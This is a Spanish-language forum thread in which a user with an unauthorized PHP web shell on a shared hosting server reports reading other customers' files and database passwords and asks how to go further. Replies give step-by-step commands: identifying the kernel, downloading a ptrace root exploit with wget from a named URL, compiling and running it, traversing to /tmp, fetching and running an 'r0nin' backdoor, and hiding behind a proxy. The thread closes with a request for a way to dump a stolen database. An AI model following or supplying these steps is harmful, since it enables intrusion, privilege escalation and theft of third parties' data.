Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales
 Autor
|
Tema: ayuda con bug (Leído 1,515 veces)
|
|
ghosting
|
pasa lo siguiente. atraves de algo sencillisimo como el comando Exec_shell de php se puede explorar el servidor cierto?
bueno esto lo hice en un servidor q estaba hosteado, y me cree una consola en php que me muestra lo q voy a ejecutando, con exec_shell
y comence a explorar y revisando por ahi /etc/ me encontre con la base de datos de todos los clientes de este servidor. mas de miles. y luego de curioso trate de ver si podia tambien leer sus archivos /srv/www/usuario/ y resulto ser positivo, que podia leer sin ningun problema a este usuario e incluso podia ver sus archivos en php y leerlos asi como logre ver claves de accesos etc.. y tambien claves de db mysql . despues intente si podia escribir o si podia sacar algun permiso y hasta ese tope llegue, me di cuenta que el grupo de usuario era nobody osea NADIE.
y mi pregunta es la siguiente. y es que si alguien sabe que mas podria aprovechar de esto? aparte de solo leer?
saludos
|
|
|
|
|
En línea
|
|
|
|
benek
 Desconectado
Mensajes: 118
@_benek
|
ve que kernel tiene el sistema con uname.. uname -a y busca un exploit o un backdoor like r0nin.. busca una carpeta donde tengas permisos de ejecución (like /tmp).. luego baja ahi tu exploit o backdoor.. con wget.. mira por ejemplo tengo el ptrace en lycos, a ver si me recuerdo la url xD wget http://usuarios.lycos.es/benek/ptrace-kmod.c luego que lo hayas bajado lo compilas.. gcc ptrace-kmod.c -o ejecutable aqui lo que hiciste fue compilar el source de ptrace-kmod.c con el nombre 'ejecutable.. ya luego lo ejecutas así.. ./ejecutable ' si es vulnerable el sistema ya te hiciste root.. eso lo checas haciendo.. id -a y voila  pd. lo del ptrace te puede servir, pero igual y no funca, hay más exploits o backdoors, los más conocidos como el w00t o el r0nin.. lee documentación sobre eso.. cualquier duda aqui preguntas  |
|
|
|
|
En línea
|
|
|
|
|
ghosting
|
ya mira pasa lo siguiente. explore el server y es de kernel 2.4 tambien intente crear carpeta en el /tmp/ y si se puede pero resulta que para hacer lo del comando wget necesitaria estar en la pocision de tmp/ , pero obligada mente estoy en un solo lugar ya que, esta la estoy navegando atraves de shellexec osea no es una shell normal. me imagine que podria hacer "cd /tmp/ | wget http://usuarios.lycos.es/benek/ptrace-kmod.c " pero no me resulto lo otro probe si tenia el gcc y no lo tiene al parecer porque no me muestra nada de eso al poner gcc. y eso saludos |
|
|
|
|
En línea
|
|
|
|
benek
Desconectado
Mensajes: 118
@_benek
|
pero resulta que para hacer lo del comando wget necesitaria estar en la pocision de tmp/ , pero obligada mente estoy en un solo lugar ya que, esta la estoy navegando atraves de shellexec osea no es una shell normal. me imagine que podria hacer "cd /tmp/ | wget http://usuarios.lycos.es/benek/ptrace-kmod.c " pero no me resulto lo otro probe si tenia el gcc y no lo tiene al parecer porque no me muestra nada de eso al poner gcc. y eso saludos intenta hacer.. chdir /tmp luego ves en que directorio estás con: pwd si te sale /tmp ya tas dentro, no necesitas crear otra carpeta dentro de /tmp, ahi mismo puedes hacer el wget.. para ver si tiene gcc escribes.. which gcc y/o whereis gcc comenta que pasa.. salu2
|
|
|
|
|
En línea
|
|
|
|
|
ghosting
|
ya, mira lo que me dijiste del chdir no me funciono, no me agarro ese comando. haber si me explico mejor.
resulta que la shell la navego a traves de el codigo php execshell que este tiene como funcion, onda hacer un comando y devuelve el resultado de este y se imprime en pantalla.
y resulta como estoy navegando atraves del mismo servidor pero desde un host osea estoy originalmente en /srv/www/mihost/public_html/ y al ejecutar comandos es solo desde ahi, no se mueve de pòsicion, por eso ejecuto los comandos asi, "ls -la /etc" y asi, siempre con la raiz puesta ahi.
el chdir hace que me cambie de dir en una shell normal, pero en este caso no sirve.
existira alguna forma de poner wget (direccion) (lugar donde quiero guardar por ej: /tmp/) ??
espero respuestas.
saludos
|
|
|
|
|
En línea
|
|
|
|
SeniorX
Desconectado
Mensajes: 1.347
Programador Novato
|
wow men y de donde sacaste eso de exec_shell?
|
|
|
|
|
En línea
|
try {
live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
} Precaución: La programacion puede producir adiccion |
|
|
|
|
benek
Desconectado
Mensajes: 118
@_benek
|
ya, mira lo que me dijiste del chdir no me funciono, no me agarro ese comando. haber si me explico mejor.
resulta que la shell la navego a traves de el codigo php execshell que este tiene como funcion, onda hacer un comando y devuelve el resultado de este y se imprime en pantalla.
y resulta como estoy navegando atraves del mismo servidor pero desde un host osea estoy originalmente en /srv/www/mihost/public_html/ y al ejecutar comandos es solo desde ahi, no se mueve de pòsicion, por eso ejecuto los comandos asi, "ls -la /etc" y asi, siempre con la raiz puesta ahi.
el chdir hace que me cambie de dir en una shell normal, pero en este caso no sirve.
existira alguna forma de poner wget (direccion) (lugar donde quiero guardar por ej: /tmp/) ??
espero respuestas.
saludos
ya sé que es sacar una shell por php xDD el comando chdir debería funcionar, que yo sepa wget no tiene manera de dejar el fichero bajado en algún directorio que le asignemos.. igual no chequé bien.. revisa acá.. http://gentoo-wiki.com/MAN_wget_1puedes intentar bajar ahi y luego mover a /tmp, no sé si te funcione.. pwd y te da: /srv/www/mihost/public_html/ mv archivo.c /tmp o también cp archivo.c /tmp ls -lrt /tmp salu2 |-)
|
|
|
|
|
En línea
|
|
|
|
Ertai
Ex-Staff
Desconectado
Mensajes: 2.026
Ralph Wiggum
|
Prueba escalando directorios. cd ../../../../../../../../tmp;wget blabla De esta manera llegas a la raiz del servidor y entras en tmp (da igual cuantos ../ pongas, si llegas a la raiz los otros son irrelevantes y luego haces wget. Si quieres hacer cualquier cosa en tmp acuerdate de escalar primero. Saludos. |
|
|
|
|
En línea
|
Si la felicidad se comprara, entonces el dinero sería noble. void rotar_by_ref(int& a, int& b) {
/* Quien dijo que no se podia sin una variable temporal? */
*a = *a ^ *b;
*b = *a ^ *b;
*a = *a ^ *b;
}
|
|
|
|
ghosting
|
benek. pero pasa que no me hacepta codigos en mi mismo directorio como el MV ni CP. crees q pueda servir con el Move_upload de php y lo muevo a /tmp-. aun no he provado pero lo voy a hacer. = si conoces alguna otra forma avisame  |
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.947
Lavando Platos
|
 algo asi es posible en algunos que hay por ahi.. [[quite la pagina, LCST (1) , de canada]], pero avisa a los dueños del hosting (tarde o temprano).. porque si no hasta te pueden demandar, checa que estes tras un proxy ((Highly Anonimity)).. eso me salvo alguna ves, que ya andban tras de mi en la pagina antes mencionada.. lo bueno es que solo me pusieron que mi sitio fue desactivado por no segir las reglas o no se que.. de hecho me entere de que me andaban rastreando, cuando vi que no habian borrado toda la pagina, sino que habian dejado la base de datos, y andaban separando algunos ip's, que misteriosamente se borraron.. Bueno solo son recomendaciones.. a y por cierto ni se te ocurra, poner en la pagina principal DEFACED BY *****, que por eso pasaron.. cosas, yo recomendaria, una pequeña anotación por ahí, que avise que es vulnerable.. A por cierto, no le digas a nadie que hosting es.. primero a los dueños, despues al publico(que tampoco recomiendo). Saludos (1)Lammers Can See This
|
|
|
|
« Última modificación: 23 Septiembre 2005, 07:21 por Sirdarckcat »
|
En línea
|
|
|
|
EL_ZoRRo
Desconectado
Mensajes: 234
|
Dame la salida completa de este comando y te digo si es rooteable uname -a;cat /etc/*release* Y con respecto a la shell en php puedes hacer lo sig wget http://xxxxxxxxxxxxx/r0nin;chmod 777 r0nin;./r0nin Y de esa forma instalas una backdor sencilla pero dudo que luego te puedas conectar ya que es port bind Salu2 |
|
|
|
|
En línea
|
|
|
|
|
ghosting
|
hola siguiendo con este post, tengo la siguiente DUDA.
es que con todo esto logre ver datos de toda la web o clientes en ese host.
y he logrado ver los datos de conexion de mysql para una db especifica. mi pregunta es como puedo lograr ver el contenido de la db o existe alguna manera de exportar esta y asi extraerla para despues revisarla.
el host no tiene phpmyadmin asi q e buscado maneras pero no he encontrado tampoco se mucho de mysql,
existe algun script q me permita entrar con esos datos y despues exportar o ver??
saludos
|
|
|
|
|
En línea
|
|
|
|
|
 |
